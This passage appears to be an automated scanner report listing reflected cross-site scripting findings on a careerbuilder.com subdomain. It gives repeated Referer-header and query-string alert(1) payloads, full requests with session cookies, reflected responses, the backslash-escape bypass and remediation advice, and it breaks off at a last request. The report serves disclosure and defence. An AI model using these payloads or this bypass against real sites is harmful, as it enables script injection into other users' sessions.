The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami/ HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=45845\'%3balert(1)//4dd1c60a594
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 176514 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=29994ae3a58f499198496a89a94deeb1-343070587-R3-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650E3907A73E359AD0C717375E6A181228710E52CC9569A7C897CB7D71421C75C1B4E5777777724DBD7; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:23:06 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:38:07 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL3 Date: Sun, 14 Nov 2010 22:23:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 45845\\';alert(1)//4dd1c60a594'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 480ef\'%3balert(1)//4797d19bb95 was submitted in the Referer HTTP header. This input was echoed as 480ef\\';alert(1)//4797d19bb95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami/JobResults.aspx HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=480ef\'%3balert(1)//4797d19bb95
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Length: 42228 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" X-Powered-By: ASP.NET X-PBY: BEAR28 Date: Sun, 14 Nov 2010 22:56:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> 404 Fi ...[SNIP]... Name='accounting.careerbuilder.com/404.aspx'; s_cb.server='accounting'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 480ef\\';alert(1)//4797d19bb95'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1da0c\'%3balert(1)//d1efdea3b87 was submitted in the Referer HTTP header. This input was echoed as 1da0c\\';alert(1)//d1efdea3b87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Accounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=1da0c\'%3balert(1)//d1efdea3b87
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174866 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR43 Date: Sun, 14 Nov 2010 23:16:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 1da0c\\';alert(1)//d1efdea3b87'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c01d8\'%3balert(1)//66349a66c26 was submitted in the Referer HTTP header. This input was echoed as c01d8\\';alert(1)//66349a66c26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Accounting.htm HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=c01d8\'%3balert(1)//66349a66c26
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174676 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR19 Date: Sun, 14 Nov 2010 23:00:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - c01d8\\';alert(1)//66349a66c26'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffdf8\'%3balert(1)//964dda6ef0c was submitted in the Referer HTTP header. This input was echoed as ffdf8\\';alert(1)//964dda6ef0c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_AccountsPayable.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=ffdf8\'%3balert(1)//964dda6ef0c
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 175013 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR12 Date: Sun, 14 Nov 2010 23:15:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - ffdf8\\';alert(1)//964dda6ef0c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd21d\'%3balert(1)//0eb9870a374 was submitted in the Referer HTTP header. This input was echoed as cd21d\\';alert(1)//0eb9870a374 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_AccountsPayable.htm HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=cd21d\'%3balert(1)//0eb9870a374
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174943 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR30 Date: Sun, 14 Nov 2010 23:00:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - cd21d\\';alert(1)//0eb9870a374'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd0bd\'%3balert(1)//90fb2f6d989 was submitted in the Referer HTTP header. This input was echoed as cd0bd\\';alert(1)//90fb2f6d989 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_AccountsReceivable.htm HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=cd0bd\'%3balert(1)//90fb2f6d989
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 175006 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_accountsreceivable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR24 Date: Sun, 14 Nov 2010 23:00:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - cd0bd\\';alert(1)//90fb2f6d989'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc7b1\'%3balert(1)//e155036bc0b was submitted in the Referer HTTP header. This input was echoed as cc7b1\\';alert(1)//e155036bc0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_AccountsReceivable.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=cc7b1\'%3balert(1)//e155036bc0b
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174997 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_accountsreceivable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR25 Date: Sun, 14 Nov 2010 23:17:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - cc7b1\\';alert(1)//e155036bc0b'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e2e4\'%3balert(1)//02aca8e575c was submitted in the Referer HTTP header. This input was echoed as 2e2e4\\';alert(1)//02aca8e575c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Auditing.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=2e2e4\'%3balert(1)//02aca8e575c
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174727 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_auditing.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR42 Date: Sun, 14 Nov 2010 23:17:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 2e2e4\\';alert(1)//02aca8e575c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64fde\'%3balert(1)//5d5df63807f was submitted in the Referer HTTP header. This input was echoed as 64fde\\';alert(1)//5d5df63807f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Auditing.htm HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=64fde\'%3balert(1)//5d5df63807f
Response
